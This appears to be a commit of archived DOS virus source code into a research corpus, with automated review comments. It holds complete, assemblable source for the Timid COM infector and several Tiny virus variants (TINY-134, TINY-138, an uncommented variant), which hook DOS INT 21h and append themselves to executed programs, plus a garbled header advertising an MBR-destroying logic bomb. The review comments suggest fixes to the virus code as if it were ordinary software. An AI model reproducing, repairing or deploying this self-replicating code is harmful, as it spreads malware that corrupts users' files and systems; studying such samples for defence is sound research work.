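Review bot: The comments throughout this listing, including the header block before `killed_cyl` and every per-line explanation of the payload path after `@@explode`, are unreadable mojibake (`; <20>®«­®áâìî § ¬¥­ï¥â MBR.`), which appears to be DOS OEM Cyrillic text decoded as Latin-1/CP1252 during the upload. Those comments are the only documentation the file has, so for a research corpus it should either be transcoded before archiving or carry a one-line English note naming the original code page so readers can recover them. The short text file section that follows this one has the same problem.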

@ -0,0 +1,19 @@
ÉÍËÍËÍËÍËÍËÍËÍËÍ»
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ͹ Just another stuff from
º Ú¿  Ú¿ ÚÄ º ͹
º ³ ³ ³Á³ à º ͹ ÄÄÄÄ<Ä Private Armoury Ä>ÄÄÄÄ
º Á Á Á Á ÀÄ º ͹
ÌÍÍÍÑÍÍÍÍÍÍÑÍÍ͹ ͹ FIDOnet 2:461/29.444
ÌÍÍ͵ BOMB ÆÍÍ͹ ͼ
ÈÍÍÍÏÍÍÍÍÍÍÏÍÍͼ
>-> ˆ­áâ ««ïæ¨ï ¢ MBR á ¯®«­®© § ¬¥­®© ®à¨£¨­ «ì­®£® § £àã§ç¨ª 
>-> Ž¤­®ªà â­ë© ¢§àë¢ ¯® ¤®á⨦¥­¨¨ 㪠§ ­­®© ¯à¨ ¨­áâ ««ï樨 ¤ âë
>-> <09>®«­®¥ ã­¨ç⮦¥­¨¥ ¢á¥å DOS-à §¤¥«®¢ ­  1 ¨ 2 ¦¥áâª¨å ¤¨áª å
>-> ‘ãé¥á⢥­­®¥ ¯®¢à¥¦¤¥­¨¥ Non-DOS à §¤¥«®¢ â ¬ ¦¥
<-< ‘®åà ­¥­¨¥ ¯à¥¦­¥£® MBR ¢ ä ©«¥ C:\MBR.BAK
<-< <09>®«­®áâìî ª®¬¬¥­â¨à®¢ ­­ë© ¨á室­ë© ⥪áâ (asm286)
>-> >-> €¢â®à á­¨¬ ¥â á á¥¡ï ¢áïªãî ®â¢¥âá⢥­®áâì §  «î¡ë¥ <-< <-<
>-> >-> ¯®¢à¥¦¤¥­¨ï ¨­ä®à¬ æ¨¨, ¯à®¨§®è¥¤è¨¥ ¢ १ã«ìâ â¥ <-< <-<
>-> >-> ­¥®áâ®à®¦­®£® ®¡à é¥­¨ï á ¤ ­­®© ¯à®£à ¬¬®©... ;))) <-< <-<

@ -0,0 +1,141 @@
PAGE ,132
title \asm_sour\timer.asm HIGH ACCURACY TIMER
subttl michael e. walraven
.MODEL MEDIUM
name timer
.cref
.lall
;
; High resolution timer, returns a 32 bit high resolution
; value which is the amount of elapsed time since the function
; was last called. The counts are 838.2ns each (1.19318 MHz)
; time_int() must be called first to set the timer chip to
; the proper mode.
; Counter 0 is changed in time_int() and the data from this
; counter is used in elaptime() so it must not be changed
; between calls.
; There should not be any interference in system timing
; max of 55 msec error introduced by time_int() into absolute
; system time.
; MEDIUM memory model/microsoft 5.00
; FAR PROGRAM, NEAR DATA
; cs: is code segment
; es: and ds: are data segment
; ss: within data segment
; ax: for integer return
; dx:ax: for long return
.DATA
; these data items located in the DSEG and can be accessed
; as near by C programs
PUBLIC SYS_HI
PUBLIC SYS_LOW
PUBLIC TIMER_COUNT
SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL
SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL
TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL
; NO ARGUMENTS PASSED to either function
TIMER_MODE EQU 043H
TIMER0 EQU 040H
BIOS SEGMENT AT 040H
ORG 06CH
TIMER_LOW DW ?
TIMER_HI DW ?
BIOS ENDS
PAGE
.CODE
PUBLIC _time_int
_time_int PROC
; void far time_int(void);
;
; SET THE TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE
; MODE AS SET BY DOS
MOV AL,00110100B ;CTR 0, LSB THEN MSB
;MODE 2, BINARY
OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253
SUB AX,AX ;SET 0, RESULT IN MAX COUNT
OUT TIMER0,AL
OUT TIMER0,AL
RET
_time_int ENDP
PUBLIC _elaptime
_elaptime PROC
; long int far elaptime(void);
;
; DETERMINE ELAPSED TIME SINCE LAST CALL
; RETURNS 32 BIT (LONG) VALUE WHICH IS
; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS
; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT
; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!
PUSH ES
MOV AX,BIOS
MOV ES,AX
ASSUME ES:BIOS
MOV AL,0 ;PREPARE TO LATCH COUNTER
OUT TIMER_MODE,AL ;LATCH 8253
PUSHF ;SAVE INTERRUPT STATE
CLI ;TURN INTERRUPT OFF WHILE READING CODE
IN AL,TIMER0
MOV DL,AL
IN AL,TIMER0
MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value)
MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD
MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD
; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME
MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT
MOV TIMER_COUNT,DX
SUB CX,DX
; CX: HAS LOW 16 BITS OF DIFFERENCE
MOV DX,SYS_LOW ;SWAP AND SUBTRACT
MOV SYS_LOW,BX
SBB BX,DX
; BX: HAS MID 16 BITS OF DIFFERENCE
MOV DX,SYS_HI ;SWAP AND SUBTRACT
MOV SYS_HI,AX
SBB AX,DX
; AX: HAS HIGH 16 BITS OF DIFFERENCE
; NOW HAVE A 48 BIT WORD THAT IS DIFFERENCE
; ONLY PASS BACK 32 BITS AT PRESENT
; AS DX:AX
MOV AX,CX ;LOW 16 BITS
MOV DX,BX ;MID 16 BITS
POPF
POP ES
RET
_elaptime ENDP
END
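Review bot: In `_elaptime` the counter is latched (`MOV AL,0` / `OUT TIMER_MODE,AL`) while interrupts are still enabled and `CLI` only follows afterwards; if IRQ0 fires between the latch and the read of `ES:TIMER_LOW`, the BIOS tick word advances while the latched chip count still reflects the value from before the wrap, so the returned difference is off by a whole 65536-count period (about 55 ms). Moving the `PUSHF` / `CLI` pair above the two latch instructions makes the latched count and the tick words a consistent snapshot, and the existing `POPF` already restores the caller's interrupt state. Separately, `SYS_HI`, `SYS_LOW` and `TIMER_COUNT` are declared `DW ?` and `_time_int` never initialises them, so the first `elaptime` result is meaningless; the header should say so, or `_time_int` should zero the three words. The header's `ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!` would read better in real terms: 2^32 counts at 838.2 ns is roughly one hour between calls.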


@ -0,0 +1,195 @@
;TIMID VIRUS asm by Mark Ludwig in 1991.
;
;-infects .coms only in current directory unless called by dos path statement
;-announces each file infected.
;297bytes=eff. length
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
;Slightly modified for A86 assembly.
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
;-fixed bug in code reprinted in his book.
;all infected files will have VI at byte position 4-5.
;Mark Ludwig claims copyright on this virus and said he will
; sue anyone distributing his viruses around. I say have fun!.
main segment byte
assume cs:main, ds:main, ss:nothing
org 100h
host:
jmp near ptr virus_start
db 'VI' ;identifies virus
mov ah, 4ch
mov al, 0
int 21h
virus:
comfile db '*.com',0
virus_start:
call get_start
get_start:
sub word ptr [vir_start], offset get_start - offset virus
mov dx, offset dta
mov ah, 1ah
int 21h
call find_file
jnz exit_virus
call infect
mov dx, offset fname
mov [handle] b,24h
mov ah, 9
int 21h
exit_virus: ;bug was here in book
mov dx, 80h
mov ah, 1ah
int 21h
mov bx, [vir_start]
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
mov word ptr [host], ax
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
mov word ptr [host+2],ax
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
mov byte ptr [host+4], al
mov [vir_start], 100h
ret
start_code:
nop
nop
nop
nop
nop
find_file:
mov dx, [vir_start]
add dx, offset comfile-offset virus
mov cx, 3fh
mov ah, 4eh
int 21h
ff_loop:
or al,al
jnz ff_done
call file_ok
jz ff_done
mov ah, 4fh
int 21h
jmp ff_loop
ff_done:
ret
file_ok:
mov dx, offset fname
mov ax, 3d02h
int 21h
jc fok_nzend
mov bx, ax
push bx
mov cx, 5
mov dx, offset start_image
mov ah, 3fh
int 21h
pop bx
mov ah, 3eh
int 21h
mov ax, word ptr [fsize]
add ax, offset endvirus - offset virus
jc fok_nzend
cmp byte ptr [start_image], 0e9h
jnz fok_zend
fok_nzend:
mov al, 1
or al,al
ret
fok_zend:
xor al,al
ret
infect:
mov dx, offset fname
mov ax, 3d02h
int 21h
mov word ptr [handle],ax
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4202h
int 21h
mov cx, offset final -offset virus
mov dx, [vir_start]
mov bx, word ptr [handle]
mov ah, 40h
int 21h
xor cx,cx
mov dx, word ptr [fsize]
add dx, offset start_code-offset virus
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov cx, 5
mov bx, word ptr [handle]
mov dx, offset start_image
mov ah, 40h
int 21h
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov bx, [vir_start]
mov byte ptr [start_image], 0e9h
mov ax, word ptr [fsize]
add ax, offset virus_start-offset virus-3
mov word ptr [start_image+1], ax
mov word ptr [start_image+3], 4956h
mov cx, 5
mov dx, offset start_image
mov bx, word ptr [handle]
mov ah, 40h
int 21h
mov bx, word ptr [handle]
mov ah, 3eh
int 21h
ret
final:
;data area
endvirus equ $ + 212
org 0ff2ah
dta db 1ah dup (?)
fsize dw 0,0
fname db 13 dup (?)
handle dw 0
start_image db 0,0,0,0,0
vstack dw 50h dup (?)
vir_start dw (?)
main ends
end host
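Review bot: The header line `;-fixed bug in code reprinted in his book.` and the label comment `exit_virus: ;bug was here in book` do not say what was changed, and the code at `exit_virus` is identical to the commented MASM listing of the same program later in this commit, so one of the two comments is stale. A corpus listing that claims to differ from its printed source should state the concrete difference in the header so analysts comparing the two variants do not have to diff them by hand.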
;end of timid.asm

@ -0,0 +1,210 @@
;This program is a basic virus that infects just COM files. It gets the first
;five bytes of its host and stores them elsewhere in the program and puts a
;jump to it at the start, along with the letters "VI", which are used to
;by the virus to identify an already infected program.
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
ORG 100H
;This is a shell of a program which will release the virus into the system.
;All it does is jump to the virus routine, which does its job and returns to
;it, at which point it terminates to DOS.
HOST:
jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly
db 'VI'
mov ah,4CH
mov al,0
int 21H ;terminate normally with DOS
VIRUS: ;this is a label for the first byte of the virus
COMFILE DB '*.COM',0 ;search string for a com file
VIRUS_START:
call GET_START ;get start address - this is a trick to determine the location of the start of this program
GET_START: ;put the address of GET_START on the stack with the call,
sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS
mov dx,OFFSET DTA ;put DTA at the end of the virus for now
mov ah,1AH ;set new DTA function
int 21H
call FIND_FILE ;get a com file to attack
jnz EXIT_VIRUS ;returned nz - no file to infect, exit
call INFECT ;have a good COM file to use - infect it
mov dx,OFFSET FNAME ;display the name of the file just infected
mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it
mov ah,9
int 21H ;display it
EXIT_VIRUS:
mov dx,80H ;fix the DTA so that the host program doesn't
mov ah,1AH ;get confused and write over its data with
int 21H ;file i/o or something like that!
mov bx,[VIR_START] ;get the start address of the virus
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes
mov WORD PTR [HOST],ax ;of the COM file to their
mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file
mov WORD PTR [HOST+2],ax
mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file
mov BYTE PTR [HOST+4],al
mov [VIR_START],100H ;set up stack to do return to host program
ret ;and return to host
START_CODE: ;move first 5 bytes from host program to here
nop ;nop's for the original assembly code
nop ;will work fine
nop
nop
nop
;--------------------------------------------------------------------------
;Find a file which passes FILE_OK
;
;This routine does a simple directory search to find a COM file in the
;current directory, to find a file for which FILE_OK returns with C reset.
;
FIND_FILE:
mov dx,[VIR_START]
; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it
mov cx,3FH ;search for any file, no matter what the attributes
mov ah,4EH ;do DOS search first function
int 21H
FF_LOOP:
or al,al ;is DOS return OK?
jnz FF_DONE ;no - quit with Z reset
call FILE_OK ;return ok - is this a good file to use?
jz FF_DONE ;yes - valid file found - exit with z set
mov ah,4FH ;not a valid file, so
int 21H ;do find next function
jmp FF_LOOP ;and go test next file for validity
FF_DONE:
ret
;--------------------------------------------------------------------------
;Function to determine whether the COM file specified in FNAME is useable.
;if so return z, else return nz.
;What makes a COM file useable?:
; a) There must be space for the virus without exceeding the
; 64 KByte file size limit.
; b) Bytes 0, 3 and 4 of the file are not a near jump op code,
; and 'V', 'I', respectively
;
FILE_OK:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc FOK_NZEND ;error opening file - quit and say this file can't be used
mov bx,ax ;put file handle in bx
push bx ;and save it on the stack
mov cx,5 ;next read 5 bytes at the start of the program
mov dx,OFFSET START_IMAGE ;and store them here
mov ah,3FH ;DOS read function
int 21H
pop bx ;restore the file handle
mov ah,3EH
int 21H ;and close the file
mov ax,WORD PTR [FSIZE] ;get the file size of the host
add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it
jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K
cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code?
jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set
cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?
jnz FOK_ZEND ;no, file can be infected, return with Z set
FOK_NZEND:
mov al,1 ;we'd better not infect this file
or al,al ;so return with z reset
ret
FOK_ZEND:
xor al,al ;ok to infect, return with z set
ret
;--------------------------------------------------------------------------
;This routine moves the virus (this program) to the end of the COM file
;Basically, it just copies everything here to there, and then goes and
;adjusts the 5 bytes at the start of the program and the five bytes stored
;in memory.
;
INFECT:
mov dx,OFFSET FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
mov WORD PTR [HANDLE],ax ;and save the file handle here
xor cx,cx ;prepare to write virus on new file; positon file pointer
mov dx,cx ;cx:dx pointer = 0
mov bx,WORD PTR [HANDLE]
mov ax,4202H ;locate pointer to end DOS function
int 21H
mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write
mov dx,[VIR_START] ;ds:dx = place in memory to write from
mov bx,WORD PTR [HANDLE] ;bx = file handle
mov ah,40H ;DOS write function
int 21H
xor cx,cx ;now we have to go save the 5 bytes which came from the start of the
mov dx,WORD PTR [FSIZE] ;so position the file pointer
add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus
mov bx,WORD PTR [HANDLE]
mov ax,4200H ;and use DOS to position the file pointer
int 21H
mov cx,5 ;now go write START_CODE in the file
mov bx,WORD PTR [HANDLE] ;get file handle
mov dx,OFFSET START_IMAGE ;during the FILE_OK function above
mov ah,40H
int 21H
xor cx,cx ;now go back to the start of host program
mov dx,cx ;so we can put the jump to the virus in
mov bx,WORD PTR [HANDLE]
mov ax,4200H ;locate file pointer function
int 21H
mov bx,[VIR_START] ;calculate jump location for start of code
mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9
mov ax,WORD PTR [FSIZE] ;and then the relative address
add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area
mov WORD PTR [START_IMAGE+1],ax
mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in
mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE
mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE
mov bx,WORD PTR [HANDLE] ;file handle
mov ah,40H ;DOS write function
int 21H
mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack
mov ah,3EH ;and close file
int 21H
ret ;all done, the virus is transferred
FINAL: ;label for last byte of code to be kept in virus when it moves
ENDVIRUS EQU $ + 212 ;label for determining space needed by virus
;Note: 212 = FFFF - FF2A - 1 = size of data space
; $ gives approximate size of code required for virus
ORG 0FF2AH
DTA DB 1AH dup (?) ;this is a work area for the search function
FSIZE DW 0,0 ;file size storage area
FNAME DB 13 dup (?) ;area for file path
HANDLE DW 0 ;file handle
START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file
VSTACK DW 50H dup (?) ;stack for the virus program
VIR_START DW (?) ;start address of VIRUS (overlays the stack)
MAIN ENDS
END HOST
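Review bot: The comment on `START_IMAGE DB 0,0,0,0,0` says `an area to store 3 bytes`, but the buffer is five bytes and every read or write of it uses `mov cx,5` (in FILE_OK and twice in INFECT), so it should read `;an area to store 5 bytes for reading and writing to file`. The header comment's `gets the first five bytes of its host` already matches the code; only this data-area comment is wrong.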


@ -0,0 +1,81 @@
VSize = 085h
Code Segment
Assume CS:Code
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax bx dx ds es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ; Zero AH
cwd ; Zero DX
mov bx, si ; Move handle to BX
mov ds, ax ; Set DS and ES to 60h,
mov es, ax ; the virus data segment
mov ah, 3Fh ; Read first 4 bytes
int 69h
mov al, 4Dh
scasb ; Check for 4D5Ah or infected file mark
je Close ; .EXE or already infected
mov al, 2
call LSeek ; Seek to the end, SI now contains file size
mov cl, VSize ; Virus size in CX, prepare to write
int 69h ; AH is 40h, i.e. Write operation
mov ax, 0E94Dh ; Virus header in AX
stosw ; Store it
xchg ax, si ; Move file size in AX
stosw ; Complete JMP instruction
xchg ax, dx ; Zero AX
call LSeek ; Seek to the beginning
int 69h ; AH is 40h, write the virus header
Close: mov ah,3Eh ; Close the file
int 69h
EndExec: pop es ds dx bx ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ; Seek operation
cwd ; Zero DX
DoInt21: xor cx, cx ; External entry for Open, zero cx
int 69h
mov cl, 4 ; 4 bytes will be read/written
xchg ax, si ; Store AX in SI
mov ax, 4060h ; Prepare AH for Write
xor di, di ; Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End
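Review bot: This listing has no header comment at all: nothing names the family or variant, its provenance, or the two assumptions the whole resident check depends on, namely the copy placed in segment 50h (`mov cx, 0050h` / `mov es, cx` / `rep movsw`) and the swap of the INT 21h and INT 69h vectors that every `int 69h` and the final `jmp dword ptr cs:[69h * 4]` rely on. The commented TINY-134 disassembly later in this commit documents the same mechanism, so a short header such as `; Tiny-family COM infector; resident copy in segment 50h; INT 21h reached through INT 69h` plus an attribution line would let researchers place this variant beside it without re-deriving the layout.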

@ -0,0 +1,162 @@
page ,132
name TINY134
title The 'Tiny' virus, version TINY-134
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-134 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
; The original first 4 bytes of the infected file:
first4 db 0CDh, 20, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
call do_int21
jc end_exec ; Exit on error
cbw ; Zero AH
cwd ; Zero DX
mov bx,si ; Save handle in BX
mov ds,ax ; Set DS and ES to 60h,
mov es,ax ; the virus data segment
mov ah,3F ; Read the first 4 bytes
int 69
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
mov al,'M' ; Look for `M'
repne scasb
jz end_exec ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek ; SI now contains the file size
mov cl,v_len ; Length of virus body
int 69 ; Append the virus to the file (AH is now 40h)
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
inc si ; Add 1 to file size for the JMP
xchg ax,si ; Move it in AX
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
xchg ax,dx ; Zero AX
call lseek ; Seek to the beginning
int 69 ; AH is 40h, write the JMP instruction
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek:
mov ah,42 ; Seek operation
cwd ; Zero DX
do_int21:
xor cx,cx ; External entry for Open
int 69
mov cl,4 ; 4 bytes will be read/written
xchg ax,si ; Store AX in SI
mov ax,4060 ; Prepare AH for Write
xor di,di ; Zero DI
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
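Review bot: Two comments in the installation code name the wrong vectors: L9250 says BX points at the "new INT 13h handler" while the swap on L9273 and the exit on L9327 redirect INT 21h, and L9266 says the old handler is moved "to INT 32h" when both of those lines use INT 69h; I would change them to `Point BX at new INT 21h handler` and `Move the INT 21h handler to INT 69h`. The "Exit on error" on L9291 also overstates what executes: `do_int21` ends with `xor di,di` (L9337) before returning, which clears CF, so `jc end_exec` is never taken and an open failure proceeds with the error code in BX; `jc end_exec ; dead: CF cleared by xor di,di in do_int21` would be accurate. Note too that this version never issues a close (function 3Eh) on the opened handle, neither on the `jz end_exec` path at L9304 nor after the write on L9318, so a handle is leaked into the calling process on every EXEC. The four bytes of `mov ah,3E`/`int 69` are exactly the difference to the TINY-138 listing that follows, which is worth a line in the header box for anyone comparing variants.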


@ -0,0 +1,168 @@
page ,132
name TINY138
title The 'Tiny' virus, version TINY-138
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-138 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
call do_int21
jc end_exec ; Exit on error
cbw ; Zero AH
cwd ; Zero DX
mov bx,si ; Save handle in BX
mov ds,ax ; Set DS and ES to 60h,
mov es,ax ; the virus data segment
mov ah,3F ; Read the first 4 bytes
int 69
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
mov al,'M' ; Look for `M'
repne scasb
jz close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek ; SI now contains the file size
mov cl,v_len ; Length of virus body
int 69 ; Append the virus to the file (AH is now 40h)
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
inc si ; Add 1 to file size for the JMP
xchg ax,si ; Move it in AX
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
xchg ax,dx ; Zero AX
call lseek ; Seek to the beginning
int 69 ; AH is 40h, write the JMP instruction
close:
mov ah,3E ; Close the file
int 69
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek:
mov ah,42 ; Seek operation
cwd ; Zero DX
do_int21:
xor cx,cx ; External entry for Open
int 69
mov cl,4 ; 4 bytes will be read/written
xchg ax,si ; Store AX in SI
mov ax,4060 ; Prepare AH for Write
xor di,di ; Zero DI
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
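Review bot: The vector names in the installation comments do not match this listing: L9377 says "new INT 13h handler" and L9393 says the old handler is moved "to INT 32h", but the swap on L9400 and the exit on L9457 use INT 69h and the hooked vector is INT 21h. I would correct them to `Point BX at new INT 21h handler` and `Move the INT 21h handler to INT 69h`; the INT 32h wording appears to have been carried over from the later TINY-154 and up listings, which do use INT 32h. The "Exit on error" on L9418 is also not what executes: `do_int21` ends with `xor di,di` (L9467) before returning, which clears CF, so the `jc end_exec` never fires and an open failure continues with the DOS error code in BX as a handle; `jc end_exec ; dead: CF cleared by xor di,di in do_int21` states the real behaviour. One more documentation point for L9426–L9431: `repne scasb` runs with CL = 4 left by `do_int21` (L9464), so it scans all four bytes read, and any file with an 'M' anywhere in bytes 0–3 is skipped, not only MZ headers and the marker in byte 3 as the comment describes.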


@ -0,0 +1,174 @@
page ,132
name TINY143
title The 'Tiny' virus, version TINY-143
.radix 16
